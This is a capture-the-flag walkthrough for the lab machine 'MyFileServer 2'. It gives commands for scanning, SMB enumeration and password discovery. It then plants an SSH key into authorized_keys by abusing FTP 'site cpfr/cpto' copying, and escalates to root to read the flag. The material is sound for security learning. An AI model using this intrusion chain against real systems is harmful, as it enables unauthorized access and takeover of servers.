Secuneus TryHackme Walkthrough : MyFileServer 2

Penetration Testing Methodologies

Network Scan

·        Netdiscover

·        Nmap

Enumeration

·        Nikto

·        Telnet

·        Smbmap

Exploit

Privilege Escalation

Walkthrough

Step 1: Run Netdiscover tool to check all the devices connected on the same network from where you can get the IP of the target.The IP found here is 192.168.1.46

Command = netdiscover -i eth0 192.168.1.54/24

Step 2: Run Nmap tool(Nmap Aggressive) using the command on the IP of the target to check all on the open ports.

Command = nmap -A 192.168.1.46 

Step 3: To get the Username of the target use the Smbmap command because smb is open on port number 445 from which you will get the access of the information from where you will get the username that is smbuser. Along with the username you will also get other information like Smbdata directory that has the read and write permission.

Command = smbmap -H 192.168.1.46

To get the password of the target check for hidden files using Nikto, with the command from where you can get the hidden files and from where you will get a hidden file named ‘readme.txt’ and by putting that with IP (192.168.1.46) in the browser you can get the password that is rootroot1

Command = nikto –url http://192.168.1.46

Step 4: Now as there is a ssh port open that can be accessed which can provide the shell access of the target but at first, we need to make a pair of public key and private key to get authentication in the ssh protocol.

command = sudo ssh-keygen

In this case public key is td.pub and private key is td

Step 5 : In this using the smbclient command we will get the access to the smbdata directory in which we will put the public key in order to get the shell access.

Command = sudo smbclient //192.168.1.46/smbdata

In this we need to put the public key that we made by entering the location of the key.

Command = cd samba

                       put /home/kali/td.pub authorized_key

Step 6 :To shift the key to smbuser using the FTP protocol, telnet is used to get the remote access from one machine to another for which you need to shift the key from /smbdata/samba/authorized_key to /home/smbuser/.ssh/authorized_keys in order to get the ssh access.

Command = telnet 192.168.1.46 2121 

Now to copy it from samba (which is a directory in smbdata) to smbuser.

Command = site cpfr /smbdata/samba/authorized_key

                       site cpto /home/smbuser/.ssh/authorized_keys

Step 7 : The last step is to get the shell access for which first you need to become the root user then go to the shell using ssh protocol in which you need to enter the password you got earlier (i.e. rootroot1), then you need to become the root user in that and change the directory from smbuser to root user. After that when you will check the files, you will get a file proof.txt and after reading that file you will Capture The Flag in that file.

Command = ssh -i td [email protected]

                       su root

                       rootroot1

                       cd

                       ls

                       cat proof.txt

Created By – Devansh Thapar